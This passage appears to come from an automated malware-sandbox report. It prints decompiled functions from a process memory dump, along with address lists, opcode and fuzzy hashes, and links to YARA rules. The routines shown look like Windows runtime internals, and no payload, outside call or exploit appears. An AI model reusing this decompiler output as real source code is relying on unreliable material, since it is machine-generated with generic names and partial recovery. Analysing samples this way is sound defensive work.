                                                    0x04b491b4
                                                    0x04b491b4
                                                    0x04b491bb
                                                    0x04b491c0
                                                    0x04b491c5
                                                    0x04b491c7
                                                    0x04ba37da
                                                    0x04b491cd
                                                    0x04b491cd
                                                    0x04b491cd
                                                    0x04b491d2
                                                    0x04b491d5
                                                    0x04b49239
                                                    0x04b49239
                                                    0x04b491d7
                                                    0x04b491db
                                                    0x04b491e1
                                                    0x04b491e7
                                                    0x04b491fd
                                                    0x04b49203
                                                    0x04b4921e
                                                    0x04b49223
                                                    0x00000000
                                                    0x04b49223
                                                    0x04b49205
                                                    0x04b49208
                                                    0x04b4920c
                                                    0x04b49214
                                                    0x04b49214
                                                    0x04b491e9
                                                    0x04b491e9
                                                    0x04b491ee
                                                    0x04b491f3
                                                    0x04b491f3
                                                    0x04b491f3
                                                    0x04b491e7
                                                    0x00000000
                                                    0x04b491db
                                                    0x04b49187
                                                    0x04b49168

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bcde96dc3c9fc6973947e8385ed599be24859c6f2970f045fa4fbc759d9268b9
                                                    • Instruction ID: 0c05284b6e3e423d47dc52d4a59fffd159aba9a13d9122faf3fe3733fc022361
                                                    • Opcode Fuzzy Hash: bcde96dc3c9fc6973947e8385ed599be24859c6f2970f045fa4fbc759d9268b9
                                                    • Instruction Fuzzy Hash: 6F31C3B5A05244EFEB25EF78C488BAEBBF1FB89354F1481D9D40467250C334B990EB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B60050, Relevance: .1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E04B60050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x4c3d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04B79ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E04B8B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04C18A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04B79702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x4c3b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                    0x04b60055
                                                    0x04b6005d
                                                    0x04b60062
                                                    0x04b6006c
                                                    0x04b6006f
                                                    0x04b60074
                                                    0x04b6007a
                                                    0x04b6007a
                                                    0x04b60080
                                                    0x04b60080
                                                    0x04b60087
                                                    0x04b6008d
                                                    0x04b6008f
                                                    0x04b60093
                                                    0x04b60095
                                                    0x04b6009b
                                                    0x04b600f8
                                                    0x04b600fb
                                                    0x04b600fc
                                                    0x04b600ff
                                                    0x04b60108
                                                    0x04b60108
                                                    0x04b600a2
                                                    0x04b600a6
                                                    0x04b600b3
                                                    0x04b600bc
                                                    0x04b600c5
                                                    0x04b600ca
                                                    0x04bac01e
                                                    0x00000000
                                                    0x00000000
                                                    0x04bac02d
                                                    0x04b600d5
                                                    0x04b600d9
                                                    0x04bac03d
                                                    0x04bac046
                                                    0x04bac046
                                                    0x04b600df
                                                    0x04b600e2
                                                    0x04b600ea
                                                    0x04b600ef
                                                    0x04b600f2
                                                    0x04b600f6
                                                    0x04b60111
                                                    0x04b60117
                                                    0x04b60117
                                                    0x00000000
                                                    0x04b600f6
                                                    0x04b600d0
                                                    0x04b600d0
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc573cec93da1230710282405338fd213ead9dcc02cc18a0e119364c04e73ce7
                                                    • Instruction ID: 61b0ed9f26755c68006d726b012c5ddb9d304cb18865ccc1742c71ea01223341
                                                    • Opcode Fuzzy Hash: dc573cec93da1230710282405338fd213ead9dcc02cc18a0e119364c04e73ce7
                                                    • Instruction Fuzzy Hash: 96317A31601A048FD725DF29C840B96B7E5FF88718F1445ADE49B87A90EB79BC01DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BC6C0A, Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E04BC6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04B67D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4c37b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04B64620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E04B8F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04B67D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04B89AE0();
						_t23 = L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                    0x04bc6c0a
                                                    0x04bc6c0f
                                                    0x04bc6c10
                                                    0x04bc6c13
                                                    0x04bc6c15
                                                    0x04bc6c19
                                                    0x04bc6c1c
                                                    0x04bc6c21
                                                    0x04bc6c28
                                                    0x04bc6c3a
                                                    0x04bc6c2a
                                                    0x04bc6c33
                                                    0x04bc6c33
                                                    0x04bc6c3f
                                                    0x04bc6c48
                                                    0x04bc6c4d
                                                    0x04bc6c60
                                                    0x04bc6c65
                                                    0x04bc6c69
                                                    0x04bc6c73
                                                    0x04bc6c79
                                                    0x04bc6c7f
                                                    0x04bc6c86
                                                    0x04bc6c90
                                                    0x04bc6c94
                                                    0x04bc6ca6
                                                    0x04bc6cb2
                                                    0x04bc6cbd
                                                    0x04bc6cbd
                                                    0x04bc6cc3
                                                    0x04bc6cc7
                                                    0x04bc6ccb
                                                    0x04bc6cd0
                                                    0x04bc6cd1
                                                    0x04bc6ce2
                                                    0x04bc6ce2
                                                    0x04bc6c69
                                                    0x04bc6ced

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1786590103c2ad1692e7811dc2d659ca9bf7d75398a641093c5d73c5c15b41c5
                                                    • Instruction ID: 8479651a5fe9701931e745b69e65a0e10c8f6240c7cf65f5eb1d988ea494aa85
                                                    • Opcode Fuzzy Hash: 1786590103c2ad1692e7811dc2d659ca9bf7d75398a641093c5d73c5c15b41c5
                                                    • Instruction Fuzzy Hash: 7C21A1B1600644AFD715DF68D880F6AB7B8FF48748F1440A9F905D7791DA38ED10CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B890AF, Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E04B890AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E04B9D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E04B7E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04B64620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E04B8F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E04B7A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                    0x04b890af
                                                    0x04b890b8
                                                    0x04b890bb
                                                    0x04b890bf
                                                    0x04b890c2
                                                    0x04b890c2
                                                    0x04b890c8
                                                    0x04b890cb
                                                    0x04b890cd
                                                    0x04bc14d7
                                                    0x04bc14eb
                                                    0x04bc14eb
                                                    0x00000000
                                                    0x04bc14eb
                                                    0x04bc14db
                                                    0x04bc14e6
                                                    0x00000000
                                                    0x04bc14f2
                                                    0x04bc14e8
                                                    0x00000000
                                                    0x04bc14e8
                                                    0x04b890d8
                                                    0x04b890da
                                                    0x04b890dd
                                                    0x04b890e5
                                                    0x00000000
                                                    0x04b89139
                                                    0x04b890fa
                                                    0x04b890fe
                                                    0x04b89142
                                                    0x00000000
                                                    0x04b89142
                                                    0x04b89104
                                                    0x04b89107
                                                    0x04b8910b
                                                    0x04b89110
                                                    0x04b89118
                                                    0x04b89147
                                                    0x04b89148
                                                    0x04b8914f
                                                    0x04b89150
                                                    0x04b89151
                                                    0x04b89152
                                                    0x04b89156
                                                    0x04b8915d
                                                    0x04b89160
                                                    0x04b89168
                                                    0x04b8916c
                                                    0x04b891bc
                                                    0x04b891be
                                                    0x00000000
                                                    0x04b891be
                                                    0x04b8916e
                                                    0x04b89173
                                                    0x04b89176
                                                    0x00000000
                                                    0x00000000
                                                    0x04b8917c
                                                    0x04b89180
                                                    0x04b891b5
                                                    0x00000000
                                                    0x04b891b5
                                                    0x04b89182
                                                    0x04b89185
                                                    0x04b89189
                                                    0x00000000
                                                    0x00000000
                                                    0x04b8918e
                                                    0x04b89190
                                                    0x04b89198
                                                    0x00000000
                                                    0x00000000
                                                    0x04b891a0
                                                    0x00000000
                                                    0x04b891ad
                                                    0x04b891ad
                                                    0x04b891b0
                                                    0x04b891b1
                                                    0x00000000
                                                    0x04b89185
                                                    0x04b8911a
                                                    0x04b8911c
                                                    0x04b8911f
                                                    0x04b89125
                                                    0x04b89127
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction ID: 525ef08431b64efa671ad24975ab50ba5c3df5f0009b6ffbfc46be8ad156479a
                                                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                    • Instruction Fuzzy Hash: CF214FB1A00204EFDB20EF59C984A6AF7F8EB44754F1488AEE955A7250D334FD50DF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B73B7A, Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E04B73B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x4c384c4; // 0x0
				_v12 = 1;
				_v8 =  *0x4c384c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4c384c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E04B8AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E04B8FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4c384c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x4c384c4; // 0x0
					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                    0x04b73b89
                                                    0x04b73b96
                                                    0x04b73ba1
                                                    0x04b73bab
                                                    0x04b73bb5
                                                    0x04b73bb9
                                                    0x04bb6298
                                                    0x04b73bbf
                                                    0x04b73bc2
                                                    0x04b73bc3
                                                    0x04b73bc9
                                                    0x04b73bca
                                                    0x04b73bcc
                                                    0x04b73bcd
                                                    0x04b73bd4
                                                    0x04b73bd6
                                                    0x04b73bdb
                                                    0x04b73bea
                                                    0x04b73bf7
                                                    0x04b73bfb
                                                    0x04b73bff
                                                    0x04b73c09
                                                    0x04b73c0a
                                                    0x04b73c0b
                                                    0x04b73c0f
                                                    0x04b73c14
                                                    0x04b73c18
                                                    0x04b73c18
                                                    0x04b73bfb
                                                    0x04b73c1b
                                                    0x04b73c30
                                                    0x04b73c30
                                                    0x04b73c3d

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 833b8bd5a5b3ec296b3819da204396e83780bb0d8a494a6d4b7e08e2eaef6147
                                                    • Instruction ID: 76602d54f530bd2225dd23b27d12b9b4fd2329a673fe74a9aea166c456063ceb
                                                    • Opcode Fuzzy Hash: 833b8bd5a5b3ec296b3819da204396e83780bb0d8a494a6d4b7e08e2eaef6147
                                                    • Instruction Fuzzy Hash: 6B2192B2600108AFD700EF58DD91B6ABBBDFB44708F1500A8F909AB651D775FD11DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BC6CF0, Relevance: .1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E04BC6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04B67D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04B67D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4b25c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E04B7F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E04B7F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04BC7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04B62400( &_v52);
								}
								_t21 = L04B62400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                    0x04bc6cfb
                                                    0x04bc6d00
                                                    0x04bc6d02
                                                    0x04bc6d06
                                                    0x04bc6d0a
                                                    0x04bc6d0e
                                                    0x04bc6d19
                                                    0x04bc6d2b
                                                    0x04bc6d1b
                                                    0x04bc6d24
                                                    0x04bc6d24
                                                    0x04bc6d33
                                                    0x04bc6d39
                                                    0x04bc6d46
                                                    0x04bc6d4f
                                                    0x04bc6d61
                                                    0x04bc6d51
                                                    0x04bc6d5a
                                                    0x04bc6d5a
                                                    0x04bc6d69
                                                    0x04bc6d6b
                                                    0x04bc6d6d
                                                    0x04bc6d6f
                                                    0x04bc6d6f
                                                    0x04bc6d74
                                                    0x04bc6d79
                                                    0x04bc6d7a
                                                    0x04bc6d7f
                                                    0x04bc6d82
                                                    0x04bc6d88
                                                    0x04bc6d89
                                                    0x04bc6d90
                                                    0x04bc6d94
                                                    0x04bc6da7
                                                    0x04bc6db1
                                                    0x04bc6db1
                                                    0x04bc6dbb
                                                    0x04bc6dbb
                                                    0x04bc6d90
                                                    0x04bc6d69
                                                    0x04bc6d46
                                                    0x04bc6dc6

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 978ae4617458b773f5a40a54a794d83396c3d71877793d3119771f0e55df9702
                                                    • Instruction ID: cbd204101549dc6ca231693dc3ceea8f858364f3290c9b6428f285a5f86db54f
                                                    • Opcode Fuzzy Hash: 978ae4617458b773f5a40a54a794d83396c3d71877793d3119771f0e55df9702
                                                    • Instruction Fuzzy Hash: 8521D372500645ABE311EF28C984F67B7EDEF81744F0409DAF98087250EB34E908D6A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C1070D, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E04C1070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04C107DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04C0AFDE( &_v8,  &_v12);
					E04C11293(_t38, _v28, _t60);
					if(E04B67D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04C014FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                    0x04c1071b
                                                    0x04c10724
                                                    0x04c10734
                                                    0x04c10738
                                                    0x04c1074b
                                                    0x04c1074b
                                                    0x04c10753
                                                    0x04c10753
                                                    0x04c10759
                                                    0x04c1075d
                                                    0x04c10774
                                                    0x04c10779
                                                    0x04c1077d
                                                    0x04c10789
                                                    0x04c10795
                                                    0x04c107a7
                                                    0x04c10797
                                                    0x04c107a0
                                                    0x04c107a0
                                                    0x04c107af
                                                    0x04c107c4
                                                    0x04c107cd
                                                    0x04c107cd
                                                    0x04c107af
                                                    0x04c107dc

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                    • Instruction ID: 634c80999e55491cbbfec376d8dd3c39e591e48ddcbb4382705fdf8d15156b7e
                                                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                    • Instruction Fuzzy Hash: A92134362042049FD705DF18C880B6ABBE6EFC5354F088569F9958B791DB30E949DB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B6AE73, Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E04B6AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04B67D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04B67D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04B67D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04B67D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04BC7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                    0x04b6ae78
                                                    0x04b6ae7c
                                                    0x04b6ae7e
                                                    0x04b6ae81
                                                    0x04b6ae86
                                                    0x04b6ae8d
                                                    0x04bb2691
                                                    0x04b6ae93
                                                    0x04b6ae93
                                                    0x04b6ae93
                                                    0x04b6ae98
                                                    0x04b6ae9d
                                                    0x04bb26a2
                                                    0x04bb26b4
                                                    0x04bb26a4
                                                    0x04bb26ad
                                                    0x04bb26ad
                                                    0x04bb26b9
                                                    0x00000000
                                                    0x04bb26bb
                                                    0x00000000
                                                    0x04bb26bb
                                                    0x04b6aea3
                                                    0x04b6aea3
                                                    0x04b6aea3
                                                    0x04b6aeaa
                                                    0x04bb26c0
                                                    0x04bb26c9
                                                    0x04bb26c9
                                                    0x04b6aeb3
                                                    0x04bb26d4
                                                    0x04bb26e1
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb26e7
                                                    0x04bb26ee
                                                    0x04bb26f0
                                                    0x04bb26f9
                                                    0x04bb26f9
                                                    0x04bb2702
                                                    0x04bb2708
                                                    0x04bb2708
                                                    0x04bb270b
                                                    0x04bb270f
                                                    0x04bb2711
                                                    0x04bb2711
                                                    0x04bb2725
                                                    0x04bb2725
                                                    0x00000000
                                                    0x04b6aeb9
                                                    0x04b6aeb9
                                                    0x04b6aebf
                                                    0x04b6aebf
                                                    0x04b6aeb3

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                    • Instruction ID: 72c5a6e73f8ab1e1d8b5dcd658dc1eca6c30e04ba42f8f51241baeb1fd302fac
